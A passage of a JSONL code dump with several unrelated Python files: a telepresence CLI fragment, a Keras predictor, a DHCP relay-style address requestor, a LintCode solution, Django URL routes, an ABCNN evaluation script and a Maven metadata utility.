is required when using '--docker-mount'.\"\n )\n\n args.expose = PortMapping.parse(args.expose)\n args.container_to_host = PortMapping.parse(args.container_to_host)\n return args\n\n\nHELP_EXAMPLES = \"\"\"\\\n== Examples ==\n\nSend a HTTP query to Kubernetes Service called 'myservice' listening on port \\\n8080:\n\n$ telepresence --run curl http://myservice:8080/\n\nReplace an existing Deployment 'myserver' listening on port 9090 with a local \\\nprocess listening on port 9090:\n\n$ telepresence --swap-deployment myserver --expose 9090 \\\n --run python3 -m http.server 9090\n\nUse a different local port than the remote port:\n\n$ telepresence --swap-deployment myserver --expose 9090:80 \\\n --run python3 -m http.server 9090\n\nRun a Docker container instead of a local process:\n\n$ telepresence --swap-deployment myserver --expose 80 \\\n --docker-run -i -t nginx:latest\n\n\n== Detailed usage ==\n\"\"\"\n\nBUG_REPORT_TEMPLATE = u\"\"\"\\\n### What were you trying to do?\n\n(please tell us)\n\n### What did you expect to happen?\n\n(please tell us)\n\n### What happened instead?\n\n(please tell us - the traceback is automatically included, see below.\nuse https://gist.github.com to pass along full telepresence.log)\n\n### Automatically included information\n\nCommand line: `{}`\nVersion: `{}`\nPython version: `{}`\nkubectl version: `{}`\noc version: `{}`\nOS: `{}`\n\n```\n{}\n```\n\nLogs:\n\n```\n{}\n```\n\"\"\"\n","sub_path":"telepresence/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":19122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"346141880","text":"import cv2 \nimport tensorflow as tf\nimport pandas as pd\nimport pickle\nman_classes = pickle.load(open(\"man-list.pickle\", \"rb\"))\nmodel = tf.keras.models.load_model(\"64x3-CNN.model\")\n\ndef prepare(filepath):\n img_height = 65\n img_width = 100\n img_array = cv2.imread(filepath, cv2.IMREAD_GRAYSCALE)\n img_array = img_array/255.0\n 
new_array = cv2.resize(img_array, (img_height, img_width))\n return new_array.reshape(-1, img_height, img_width, 1)\n\n\ndef main():\n global model\n prediction = model.predict([prepare('img/image.jpg')])\n result = man_classes[list(prediction[0]).index(max(prediction[0]))]\n return result\n\n\n\n\n","sub_path":"neural.py","file_name":"neural.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"452940806","text":"# vim:set fileencoding=utf-8 ft=python ts=8 sw=4 sts=4 et cindent:\n\n# dhcprequestor.py -- Requests an IP address on behalf of a given MAC address.\n#\n# Copyright © 2010 Fabian Knittel \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\nimport random\nimport time\nimport logging\n\nfrom typing import Dict, Optional, Tuple, List, Callable, Iterable, Any\nfrom ipaddress import IPv4Address, IPv4Network\n\nfrom odr.listeningsocket import ListeningSocket\nfrom odr.timeoutmgr import TimeoutManager, TimeoutObject\n\nfrom pydhcplib.dhcp_packet import DhcpPacket\n\n\nDHCP_SUBOPTION_LINKSEL = 5\nDHCP_SUBOPTION_LINKSEL_LEN = 4\n\n\nclass DhcpAddressRequest:\n \"\"\"Represents the request for an IP address (and additional settings\n relevant for the target network) based on a MAC address.\n\n To perform the above task, DHCP packets are sent and received. 
For each\n packet, the class pretends to be a DHCP relay so that all answers can be\n received and responded to, although the requested IP address is completely\n different from the one that the packets are received on.\n\n The DHCP requests are targeted at specific DHCP server IP addresses.\n\n As soon as the request has completed, has failed or has timed out, the\n apropriate call back handler is called.\n \"\"\"\n\n AR_DISCOVER = 1\n AR_REQUEST = 2\n\n def __init__(\n self,\n *,\n log: logging.Logger,\n requestor: \"DhcpAddressRequestor\",\n timeout_mgr: TimeoutManager,\n success_handler_clb: Callable[[Dict], None],\n failure_handler_clb: Callable[[], None],\n local_ip: str,\n client_identifier: str,\n server_ips: Iterable[str],\n target_addr: str = None,\n max_retries: int = 3,\n timeout: int = 4,\n lease_time: int = None\n ) -> None:\n \"\"\"Sets up the address request.\n\n Creates a new XID. Each address request has such a unique (randomly\n chosen) identifier.\n\n :ivar log: Instance of the logger for this class.\n :ivar requestor: Instance of the requestor, where the request is\n tracked and where the listening socket is maintained.\n :ivar timeout_mgr: Instance of the timeout manager.\n :ivar success_handler_clb: Call-back that is called as soon as the\n request has succeeded.\n :ivar failure_handler_clb: Call-back that is called as soon as the\n request has failed or timed out.\n :ivar local_ip: IP address from which all DHCP requests originate and\n on which the responses are received. 
Is used within the DHCP\n packets.\n :ivar client_identifier: The client identifier which will represent the\n client for which an IP address is requested.\n :ivar server_ips: A list of IP addresses to which the DHCP requests\n should be sent.\n :ivar target_addr: An address specifying the subnet to send the reqest\n for, which will be sent to the DHCP server using the link\n selection option descriped in RFC 3527\n :ivar max_retries: The maximum number of retries after timeouts.\n Defaults to 2 retries.\n :ivar timeout: Number of seconds to wait for a DHCP response before\n timing out and/or retrying the request. Defaults to 5 seconds.\n :ivar lease_time: DHCP lease time we would like to have. Defaults to\n None, meaning no specific lease time is requested.\n \"\"\"\n self._log = log\n self._requestor = requestor\n self._timeout_mgr = timeout_mgr\n self._success_handler = success_handler_clb\n self._failure_handler = failure_handler_clb\n self._local_ip = IPv4Address(local_ip)\n self._client_identifier = client_identifier.encode(\"utf-8\")\n self._server_ips = [IPv4Address(ip) for ip in server_ips]\n self._target_addr = IPv4Address(target_addr) if target_addr else None\n self._max_retries = max_retries\n self._initial_timeout = timeout\n self._lease_time = lease_time\n\n self._start_time = int(time.time())\n\n self._xid = random.randint(0, (2 ** 32) - 1)\n\n # Current packet state.\n self._state = None # type: Optional[int]\n\n # What's the current timeout? (Will be increased after each timeout\n # event.)\n self._timeout = self._initial_timeout\n # When will the packet time out?\n self._timeout_obj = None # type: Optional[TimeoutObject]\n # What was the contents of the last packet? 
(Used for retry.)\n self._last_packet = None # type: Optional[DhcpPacket]\n # Number of packet retries\n self._packet_retries = 0\n\n def __del__(self) -> None:\n self._log.debug('xid %d destroyed', self.xid)\n\n @property\n def xid(self) -> int:\n \"\"\":returns: the unique identifier of the DHCP request.\n \"\"\"\n return self._xid\n\n def _generate_base_packet(self) -> DhcpPacket:\n packet = DhcpPacket()\n packet.AddLine(\"op: BOOTREQUEST\")\n packet.AddLine(\"htype: 1\")\n packet.SetOption(\"xid\", self._xid.to_bytes(4, \"big\"))\n\n # We're the gateway.\n packet.SetOption(\"giaddr\", self._local_ip.packed)\n\n if self._target_addr:\n packet.SetOption(\n \"relay_agent\",\n bytes((DHCP_SUBOPTION_LINKSEL, DHCP_SUBOPTION_LINKSEL_LEN))\n + self._target_addr.packed,\n )\n\n # Request IP address, etc. for the following client identifier.\n packet.SetOption(\"client_identifier\", self._client_identifier)\n\n # We pretend to be a gateway, so the packet hop count is > 0 here.\n packet.AddLine(\"hops: 1\")\n\n return packet\n\n def _add_option_list(self, packet: DhcpPacket) -> None:\n # 'classless_static_route' must be requested before 'router'.\n packet.AddLine(\n \"parameter_request_list: subnet_mask,\"\n \"classless_static_route,router,\"\n \"domain_name_server,domain_name,renewal_time_value,\"\n \"rebinding_time_value\"\n )\n\n def _set_lease_time(self, packet: DhcpPacket) -> None:\n if self._lease_time is None:\n return\n packet.SetOption('ip_address_lease_time', self._lease_time.to_bytes(4, \"big\"))\n\n def _retrieve_server_ip(self, packet: DhcpPacket) -> None:\n \"\"\"In case we're sending the requests to more than one DHCP server,\n attempt to determine which DHCP server answered, so that we can restrict\n our future requests to only one server.\n \"\"\"\n if len(self._server_ips) > 1:\n self._log.debug(\"Attempting to find server ip\")\n try:\n self._server_ips = [IPv4Address(packet.GetOption('server_identifier'))]\n except Exception:\n 
self._log.exception(\"invalid server ip response\")\n else:\n # We were able to determine a single DHCP server with which we\n # will communicate from now on.\n self._log.debug(\"Found server ip %s\", self._server_ips[0])\n\n def _send_packet(self, packet: DhcpPacket) -> None:\n \"\"\"Method to initially send a packet.\n \"\"\"\n self._last_packet = packet\n self._packet_retries = 0\n self._timeout = self._initial_timeout\n self._send_to_server(packet)\n\n def _resend_packet(self) -> None:\n \"\"\"Method to re-send the packet that was sent last.\n \"\"\"\n assert self._last_packet is not None\n self._packet_retries += 1\n self._timeout *= 2\n self._send_to_server(self._last_packet)\n\n def _send_to_server(self, packet: DhcpPacket) -> None:\n \"\"\"Method that does the actual packet sending. The packet is sent once\n for each DHCP server destination.\n \"\"\"\n randomised_timeout = self._timeout + random.uniform(-1, 1)\n self._log.debug('timeout for xid %d is %ds', self.xid, randomised_timeout)\n timeout_time = time.time() + randomised_timeout\n self._timeout_obj = TimeoutObject(timeout_time, self.handle_timeout)\n self._timeout_mgr.add_timeout_object(self._timeout_obj)\n for server_ip in self._server_ips:\n self._log.debug(\n \"Sending packet in state %s to %s [%d/%d]\",\n self._state,\n server_ip,\n self._packet_retries + 1,\n self._max_retries + 1,\n )\n self._requestor.send_packet(packet, str(server_ip), 67)\n\n def _valid_source_address(self, packet: DhcpPacket) -> bool:\n if not packet.source_address:\n return False\n ip_address_str, port = packet.source_address # type: (str, int)\n ip_address = IPv4Address(ip_address_str)\n if port != 67:\n self._log.debug(\n \"dropping packet from wrong port: %s:%d\", packet.source_address, port\n )\n return False\n if ip_address not in self._server_ips:\n self._log.debug(\n \"dropping packet from wrong IP address: %s:%d\",\n packet.source_address,\n port,\n )\n return False\n return True\n\n def handle_dhcp_offer(self, 
offer_packet: DhcpPacket) -> None:\n \"\"\"Called by the requestor as soon as a DHCP OFFER packet is received\n for our XID.\n\n In case the packet matches what we currently expect, the packet is\n parsed and a matching DHCP REQUEST packet is generated.\n \"\"\"\n if self._state != self.AR_DISCOVER:\n self._log.debug(\"received unsolicited offer\")\n return\n self._log.debug(\"Received offer\")\n if not self._valid_source_address(offer_packet):\n return\n if self._timeout_obj:\n self._timeout_mgr.del_timeout_object(self._timeout_obj)\n req_packet = self._generate_request(offer_packet)\n self._retrieve_server_ip(req_packet)\n self._state = self.AR_REQUEST\n self._send_packet(req_packet)\n\n def handle_dhcp_ack(self, packet: DhcpPacket) -> None:\n \"\"\"Called by the requestor as soon as a DHCP ACK packet is received for\n our XID.\n\n In case the packet matches what we currently expect, the packet is\n parsed and the success handler called.\n\n The request instance (self) is removed from the requestor and will\n therefore be destroyed soon.\n \"\"\"\n if self._state != self.AR_REQUEST:\n return\n self._log.debug(\"Received ACK\")\n if not self._valid_source_address(packet):\n return\n if self._timeout_obj:\n self._timeout_mgr.del_timeout_object(self._timeout_obj)\n self._requestor.del_request(self)\n result = {} # type: Dict[str, Any]\n result['domain'] = packet.GetOption('domain_name').decode(\"ascii\")\n\n translate_ips = {\n 'yiaddr': 'ip_address',\n 'subnet_mask': 'subnet_mask',\n 'router': 'gateway',\n }\n for opt_name in translate_ips:\n if not packet.IsOption(opt_name):\n continue\n val = packet.GetOption(opt_name)\n if len(val) == 4:\n result[translate_ips[opt_name]] = str(IPv4Address(val))\n\n dns = [] # type: List[str]\n result['dns'] = dns\n dns_list = packet.GetOption('domain_name_server')\n while len(dns_list) >= 4:\n dns.append(str(IPv4Address(dns_list[:4])))\n dns_list = dns_list[4:]\n\n if packet.IsOption('classless_static_route'):\n static_routes = 
parse_classless_static_routes(\n list(packet.GetOption('classless_static_route'))\n )\n if static_routes is not None:\n if 'gateway' in result:\n # We MUST ignore a regular default route if static routes\n # are sent.\n del result['gateway']\n # Find and filter out default route (if any). And set it as\n # the new gateway parameter.\n result['static_routes'] = []\n for network, netmask, gateway in static_routes:\n if network == '0.0.0.0' and netmask == '0.0.0.0':\n result['gateway'] = gateway\n else:\n result['static_routes'].append((network, netmask, gateway))\n del static_routes\n\n # Calculate lease timeouts (with RFC T1/T2 if not found in packet)\n lease_delta = int.from_bytes(packet.GetOption('ip_address_lease_time'), \"big\")\n result['lease_timeout'] = self._start_time + lease_delta\n if packet.IsOption('renewal_time_value'):\n renewal_delta = int.from_bytes(\n packet.GetOption('renewal_time_value'), \"big\"\n )\n else:\n renewal_delta = int(lease_delta * 0.5) + random.randint(-5, 5)\n result['renewal_timeout'] = self._start_time + renewal_delta\n if packet.IsOption('rebinding_time_value'):\n rebinding_delta = int.from_bytes(\n packet.GetOption('rebinding_time_value'), \"big\"\n )\n else:\n rebinding_delta = int(lease_delta * 0.875) + random.randint(-5, 5)\n result['rebinding_timeout'] = self._start_time + rebinding_delta\n\n self._success_handler(result)\n\n def handle_dhcp_nack(self, packet: DhcpPacket) -> None:\n \"\"\"Called by the requestor as soon as a DHCP NACK packet is received for\n our XID.\n\n In case the packet matches what we currently expect, the failure handler\n is called.\n\n The request instance (self) is removed from the requestor and will\n therefore be destroyed soon.\n \"\"\"\n if self._state != self.AR_REQUEST:\n return\n self._log.debug(\"Received NACK\")\n if not self._valid_source_address(packet):\n return\n if self._timeout_obj:\n self._timeout_mgr.del_timeout_object(self._timeout_obj)\n self._requestor.del_request(self)\n 
self._failure_handler()\n\n def handle_timeout(self) -> None:\n \"\"\"Called in case the timeout_time has passed without a proper DHCP\n response. Handles resend attempts up to a certain maximum number of\n retries.\n\n In case the maximum number of retries have been attempted, the failure\n handler is called. Additionally, the request instance (self) is removed\n from the requestor and will therefore be destroyed soon.\n \"\"\"\n self._log.debug(\"handling timeout for %d\", self.xid)\n if self._packet_retries >= self._max_retries:\n self._requestor.del_request(self)\n self._log.debug(\"Timeout for reply to packet in state %s\", self._state)\n self._failure_handler()\n elif self._last_packet is not None:\n self._resend_packet()\n\n def _generate_request(self, offer_packet: DhcpPacket) -> DhcpPacket:\n \"\"\"Generates a DHCP REQUEST packet.\n \"\"\"\n raise NotImplementedError('Method _generate_request not implemented')\n\n\nclass DhcpAddressInitialRequest(DhcpAddressRequest):\n \"\"\"\n \"\"\"\n\n def __init__(self, **kwargs) -> None:\n \"\"\"Sets up the initial address request.\n\n See :meth:`DhcpAddressRequest.__init__` for further parameters.\n \"\"\"\n DhcpAddressRequest.__init__(\n self, log=logging.getLogger('dhcpaddrinitreq'), **kwargs\n )\n\n self._log.debug('initial request with xid %d created', self.xid)\n self._state = self.AR_DISCOVER\n\n self._requestor.add_request(self)\n self._send_packet(self._generate_discover())\n\n def _generate_discover(self) -> DhcpPacket:\n \"\"\"Generates a DHCP DISCOVER packet.\n \"\"\"\n packet = self._generate_base_packet()\n packet.AddLine(\"dhcp_message_type: DHCP_DISCOVER\")\n self._add_option_list(packet)\n self._set_lease_time(packet)\n return packet\n\n def _generate_request(self, offer_packet: DhcpPacket) -> DhcpPacket:\n \"\"\"Generates a DHCP REQUEST packet.\n \"\"\"\n packet = self._generate_base_packet()\n packet.AddLine(\"dhcp_message_type: DHCP_REQUEST\")\n self._add_option_list(packet)\n 
self._set_lease_time(packet)\n for opt in [\"server_identifier\"]:\n packet.SetOption(opt, offer_packet.GetOption(opt))\n packet.SetOption(\"request_ip_address\", offer_packet.GetOption(\"yiaddr\"))\n return packet\n\n\nclass DhcpAddressRefreshRequest(DhcpAddressRequest):\n \"\"\"\n \"\"\"\n\n def __init__(self, client_ip: str, **kwargs) -> None:\n \"\"\"Sets up the address request.\n\n See :meth:`DhcpAddressRequest.__init__` for further parameters.\n \"\"\"\n super().__init__(log=logging.getLogger('dhcpaddrrefreshreq'), **kwargs)\n\n self._client_ip = IPv4Address(client_ip)\n self._log.debug('refresh request with xid %d created', self.xid)\n\n self._state = self.AR_REQUEST\n\n self._requestor.add_request(self)\n self._send_packet(self._generate_refresh_request())\n\n def _generate_refresh_request(self) -> DhcpPacket:\n \"\"\"Generates a DHCP REQUEST packet.\n \"\"\"\n packet = self._generate_base_packet()\n packet.AddLine(\"dhcp_message_type: DHCP_REQUEST\")\n self._add_option_list(packet)\n self._set_lease_time(packet)\n packet.SetOption(\"request_ip_address\", self._client_ip.packed)\n return packet\n\n\nclass DhcpAddressRequestor(ListeningSocket):\n \"\"\"A DhcpAddressRequestor instance represents a UDP socket listening for\n DHCP responses on a specific IP address and port on a specific network\n device.\n\n Specific requests are added to a requestor instance and use the requestor\n to send DHCP requests. 
The requestor maps DHCP responses back to a specific\n request via the request's XID.\n\n Provides attribute listen_device, listen_address (through its super-class\n ListeningSocket) and add_request method for use by the requestor manager.\n\n Provides socket (through its super-class ListeningSocket) and handle_socket\n for use by the socket loop.\n \"\"\"\n\n # Maps dhcp_message_type to a request's message type handler.\n _DHCP_TYPE_HANDLERS = {\n 2: 'handle_dhcp_offer',\n 5: 'handle_dhcp_ack',\n 6: 'handle_dhcp_nack',\n }\n\n def __init__(\n self, listen_address: str = '', listen_port: int = 67, listen_device: str = None\n ) -> None:\n \"\"\"\\\n :ivar listen_address: IP address as string to listen on.\n :ivar listen_port: Local DHCP listening port. Defaults to 67.\n :ivar listen_device: Device name to bind to.\n \"\"\"\n self._log = logging.getLogger('dhcpaddrrequestor')\n self._requests = {} # type: Dict[int, DhcpAddressRequest]\n\n super().__init__(listen_address, listen_port, listen_device)\n\n self._log.debug(\n 'listening on %s:%d@%s for DHCP responses',\n self.listen_address,\n self.listen_port,\n self.listen_device,\n )\n\n def add_request(self, request: DhcpAddressRequest) -> None:\n \"\"\"Adds a new DHCP address request to this requestor.\n\n :ivar request: The request that should be added.\n \"\"\"\n self._log.debug(\"adding xid %d\", request.xid)\n self._requests[request.xid] = request\n\n def del_request(self, request: DhcpAddressRequest) -> None:\n \"\"\"Removes a DHCP address request that was previously added.\n\n :ivar request: The request that should be removed.\n \"\"\"\n self._log.debug(\"deleting xid %d\", request.xid)\n del self._requests[request.xid]\n\n def handle_socket(self) -> None:\n \"\"\"Retrieves the next, waiting DHCP packet, parses it and calls the\n handler of the associated request.\n \"\"\"\n try:\n data, source_address = self._socket.recvfrom(2048)\n if len(data) == 0:\n self._log.warning(\"unexpectedly received EOF!\")\n 
return\n packet = DhcpPacket()\n packet.source_address = source_address\n packet.DecodePacket(data)\n\n if (not packet.IsDhcpPacket()) or (\n not packet.IsOption(\"dhcp_message_type\")\n ):\n self._log.debug(\"Ignoring invalid packet\")\n return\n\n dhcp_type = packet.GetOption(\"dhcp_message_type\")[0]\n if dhcp_type not in self._DHCP_TYPE_HANDLERS:\n self._log.debug(\"Ignoring packet of unexpected DHCP type %d\", dhcp_type)\n return\n\n xid = int.from_bytes(packet.GetOption('xid'), \"big\")\n if xid not in self._requests:\n self._log.debug(\"Ignoring answer with xid %r\", xid)\n return\n\n request = self._requests[xid]\n clb_name = self._DHCP_TYPE_HANDLERS[dhcp_type]\n if not hasattr(request, clb_name):\n self._log.error(\"request has no callback '%s'\", clb_name)\n return\n\n clb = getattr(request, clb_name)\n clb(packet)\n except Exception:\n self._log.exception('handling DHCP packet failed')\n\n def send_packet(self, packet: DhcpPacket, dest_ip: str, dest_port: int) -> None:\n data = packet.EncodePacket()\n self.socket.sendto(data, (dest_ip, dest_port))\n\n\nclass DhcpAddressRequestorManager:\n \"\"\"Holds a list of all available requestors. 
Not much more than a\n dictionary with added error detection.\n \"\"\"\n\n def __init__(self) -> None:\n self._requestors_by_device_and_ip = (\n {}\n ) # type: Dict[Tuple[Optional[str], str], DhcpAddressRequestor]\n self._log = logging.getLogger('dhcpaddrrequestormgr')\n\n def add_requestor(self, requestor: DhcpAddressRequestor) -> None:\n \"\"\"\n :ivar requestor: Instance of a requestor that should be added to\n the list of known requestors.\n \"\"\"\n listen_pair = (requestor.listen_device, requestor.listen_address)\n if listen_pair in self._requestors_by_device_and_ip:\n self._log.error(\n 'attempt to listen on IP %s@%s multiple times',\n requestor.listen_address,\n requestor.listen_device,\n )\n return\n self._requestors_by_device_and_ip[listen_pair] = requestor\n\n def has_requestor(self, device: str, local_ip: str) -> bool:\n \"\"\":returns: True if the device and local_ip already has a requestor.\n \"\"\"\n return (device, local_ip) in self._requestors_by_device_and_ip\n\n def get_requestor(\n self, device: str, local_ip: str\n ) -> Optional[DhcpAddressRequestor]:\n \"\"\"\n :returns: the requestor matching the device and local_ip, or\n None in case there is none.\n \"\"\"\n listen_pair = (device, local_ip)\n if listen_pair not in self._requestors_by_device_and_ip:\n self._log.error('request for unsupported local IP %s@%s', local_ip, device)\n return None\n return self._requestors_by_device_and_ip[listen_pair]\n\n\ndef parse_classless_static_routes(\n data: List[int],\n) -> Optional[List[Tuple[str, str, str]]]:\n \"\"\"Parses an array of ints, representing classless static routes according\n to RFC 3442, into a list of tuples with full IP addresses.\n\n :returns: a tuple consisting of network, netmask and router.\n \"\"\"\n routes = []\n remaining = data[:]\n while len(remaining) >= 5:\n mask_width = remaining.pop(0)\n\n significant_octets = (mask_width - 1) // 8 + 1\n if significant_octets > 4:\n # Invalid number of octets.\n return None\n\n network_addr = 
bytes(remaining[:significant_octets]).ljust(4, b\"\\x00\")\n remaining = remaining[significant_octets:]\n\n network = IPv4Network((network_addr, mask_width))\n\n gateway = bytes(remaining[:4])\n remaining = remaining[4:]\n\n if len(gateway) != 4:\n # List too short, malformed gateway.\n return None\n routes.append(\n (\n str(network.network_address),\n str(network.netmask),\n str(IPv4Address(gateway)),\n )\n )\n\n if len(remaining) > 0:\n # Failed to properly parse the option.\n return None\n return routes\n","sub_path":"odr/dhcprequestor.py","file_name":"dhcprequestor.py","file_ext":"py","file_size_in_byte":25062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"413785631","text":"\"\"\" 617. Maximum Average Subarray II\nDescription\nGiven an array with positive and negative numbers, find the maximum average subarray which length \nshould be greater or equal to given length k.\n\nIt's guaranteed that the size of the array is greater or equal to k.\n\nExample\nGiven nums = [1, 12, -5, -6, 50, 3], k = 3\n\nReturn 15.667 // (-6 + 50 + 3) / 3 = 15.667\n \"\"\"\n\n\nclass Solution:\n \"\"\"\n @param nums: an array with positive and negative numbers\n @param k: an integer\n @return: the maximum average\n \"\"\"\n\n def maxAverage(self, nums, k):\n # write your code here\n start, end = min(nums), max(nums)\n while start + 1e-5 < end:\n mid = (start+end) / 2\n if self.check_subarray(nums, k, mid):\n start = mid\n else:\n end = mid\n return start\n\n def has_bigger_avg(self, nums, k, avg):\n \"\"\" \n TLE at 93% \"\"\"\n prefix_sum = [0 for _ in range(len(nums)+1)]\n for i in range(1, len(nums)+1):\n prefix_sum[i] = prefix_sum[i-1] + nums[i-1] - avg\n\n min_prefix_sum = 0\n for i in range(k, len(nums)+1):\n if prefix_sum[i] - min_prefix_sum >= 0:\n return True\n min_prefix_sum = min(min_prefix_sum, prefix_sum[i-k+1])\n return False\n\n def check_subarray(self, nums, k, average):\n prefix_sum = [0]\n for num in nums:\n 
prefix_sum.append(prefix_sum[-1] + num - average)\n\n min_prefix_sum = 0\n for i in range(k, len(nums) + 1):\n if prefix_sum[i] - min_prefix_sum >= 0:\n return True\n min_prefix_sum = min(min_prefix_sum, prefix_sum[i - k + 1])\n\n return False\n\n\ndef main():\n nums = [1, 12, -5, -6, 50, 3]\n k = 3\n ans = Solution().maxAverage(nums, k)\n print(ans)\n\n\nmain()\n","sub_path":"lint-617-maximum-average-subarray-ii/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"34426296","text":"from django.urls import path\n\nfrom .views import *\n\nurlpatterns = [\n path('', PostsListView.as_view(), name='posts_list_url'),\n path('post/create/', PostCreateView.as_view(), name='post_create_url'),\n path('post//', PostDetailView.as_view(), name='post_detail_url'),\n path('post//update/', PostUpdateView.as_view(), name='post_update_url'),\n path('post//delete/', PostDeleteView.as_view(), name='post_delete_url'),\n path('tags/', TagsListView.as_view(), name='tags_list_url'),\n path('tag/create/', TagCreateView.as_view(), name='tag_create_url'),\n path('tag//', TagDetailView.as_view(), name='tag_detail_url'),\n path('tag//update/', TagUpdateView.as_view(), name='tag_update_url'),\n path('tag//delete/', TagDeleteView.as_view(), name='tag_delete_url'),\n]\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"603136034","text":"import tensorflow as tf\nimport sys\nimport numpy as np\n\nfrom preprocess import Word2Vec, MSRP, WikiQA\nfrom ABCNN import ABCNN\n\n\ndef test(w, l2_reg, data_type, max_len, model_type, model_path, word2vec, num_classes=2):\n if data_type == \"WikiQA\":\n test_data = WikiQA(word2vec=word2vec, max_len=max_len)\n else:\n test_data = MSRP(word2vec=word2vec, max_len=max_len)\n\n 
test_data.open_file(mode=\"test\")\n\n model = ABCNN(s=max_len, w=w, l2_reg=l2_reg, model_type=model_type,\n num_features=test_data.num_features, num_classes=num_classes)\n\n print(\"=\" * 50)\n print(\"test data size:\", test_data.data_size)\n\n # Due to GTX 970 memory issues\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.7)\n\n with tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)) as sess:\n saver = tf.train.Saver()\n saver.restore(sess, model_path)\n print(model_path, \"Model restored.\")\n\n QA_pairs = {}\n s1s, s2s, labels, features = test_data.next_batch(batch_size=test_data.data_size)\n\n for i in range(test_data.data_size):\n pred = sess.run(model.prediction, feed_dict={model.x1: np.expand_dims(s1s[i], axis=0),\n model.x2: np.expand_dims(s2s[i], axis=0),\n model.y: np.expand_dims(labels[i], axis=0),\n model.features: np.expand_dims(features[i], axis=0)})\n\n s1 = \" \".join(test_data.s1s[i])\n s2 = \" \".join(test_data.s2s[i])\n\n if s1 in QA_pairs:\n QA_pairs[s1].append((s2, labels[i], np.asscalar(pred)))\n else:\n QA_pairs[s1] = [(s2, labels[i], np.asscalar(pred))]\n\n # Calculate MAP and MRR for comparing performance\n MAP, MRR = 0, 0\n for s1 in QA_pairs.keys():\n QA_pairs[s1] = sorted(QA_pairs[s1], key=lambda x: x[-1], reverse=True)\n\n for idx, (s2, label, prob) in enumerate(QA_pairs[s1]):\n if label == 1:\n MRR += 1 / (idx + 1)\n break\n\n for s1 in QA_pairs.keys():\n p, AP = 0, 0\n for idx, (s2, label, prob) in enumerate(QA_pairs[s1]):\n if label == 1:\n p += 1\n AP += p / (idx + 1)\n\n AP /= p\n MAP += AP\n\n num_questions = len(QA_pairs.keys())\n MAP /= num_questions\n MRR /= num_questions\n\n print(\"MAP:\", MAP, \"MRR:\", MRR)\n\n\nif __name__ == \"__main__\":\n\n # Paramters\n # --ws: window_size\n # --l2_reg: l2_reg modifier\n # --data_type: MSRP or WikiQA data\n # --max_len: max sentence length\n # --model_type: model type\n # --model_path: path of saved model\n\n # default parameters\n params = {\n \"ws\": 4,\n 
\"l2_reg\": 0.0004,\n \"data_type\": \"WikiQA\",\n \"max_len\": 40,\n \"model_type\": \"ABCNN1\",\n \"model_path\": \"./models/WikiQA-ABCNN1-20\",\n \"word2vec\": Word2Vec(),\n }\n\n if len(sys.argv) > 1:\n for arg in sys.argv[1:]:\n k = arg.split(\"=\")[0][2:]\n v = arg.split(\"=\")[1]\n params[k] = v\n\n test(w=int(params[\"ws\"]), l2_reg=float(params[\"l2_reg\"]),\n data_type=params[\"data_type\"], max_len=int(params[\"max_len\"]),\n model_type=params[\"model_type\"], model_path=params[\"model_path\"], word2vec=params[\"word2vec\"])\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"215240338","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/dsupplee/dev/apis-client-generator/src/googleapis/codegen/utilities/maven_utils.py\n# Compiled at: 2019-01-24 16:56:47\n\"\"\"Maven-related utilities for java packages.\"\"\"\nimport re\n\ndef GetMavenArtifactId(api_name, package_path='', canonical_name='', owner_domain='google.com'):\n \"\"\"Returns the maven artifact id for a given api.\n\n Args:\n api_name: (str) The api name.\n package_path: (str|None) The package path, if any.\n canonical_name: (str|None) The canonical api name, if any.\n owner_domain: (str) The api's owner domain.\n Returns:\n (str) The artifact id.\n \"\"\"\n if package_path and canonical_name:\n api_name = canonical_name.lower().replace(' ', '')\n parts = []\n if owner_domain == 'google.com':\n parts.extend(['google', 'api', 'services'])\n if package_path:\n parts.extend(re.split('\\\\.|/', package_path))\n parts.append(api_name)\n return ('-').join(parts)\n\n\ndef GetMavenGroupId(owner_domain):\n \"\"\"Returns the maven group id for a given owner domain.\n\n Args:\n owner_domain: (str) The owner domain.\n Returns:\n (str) The group 
id.\n \"\"\"\n if owner_domain == 'google.com':\n return 'com.google.apis'\n else:\n return ('.').join(reversed(owner_domain.split('.')))\n\n\ndef GetMavenVersion(api, language_version):\n \"\"\"Returns the maven version.\"\"\"\n if api.get('ownerDomain') == 'google.com':\n return '%s-rev%s-%s' % (api['version'],\n api['revision'],\n language_version)\n return '%s-%s-SNAPSHOT' % (api['version'], language_version)\n\n\ndef GetMavenMetadata(api, language_version):\n \"\"\"Returns a dict of useful maven metadata.\"\"\"\n owner_domain = api.get('ownerDomain', 'google.com')\n return {'artifact_id': GetMavenArtifactId(api['name'], api.get('packagePath'), api.get('canonicalName'), owner_domain), \n 'group_id': GetMavenGroupId(owner_domain), \n 'version': GetMavenVersion(api, language_version)}","sub_path":"pycfiles/google_apis_client_generator-1.7.0-py2-none-any/maven_utils.py","file_name":"maven_utils.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 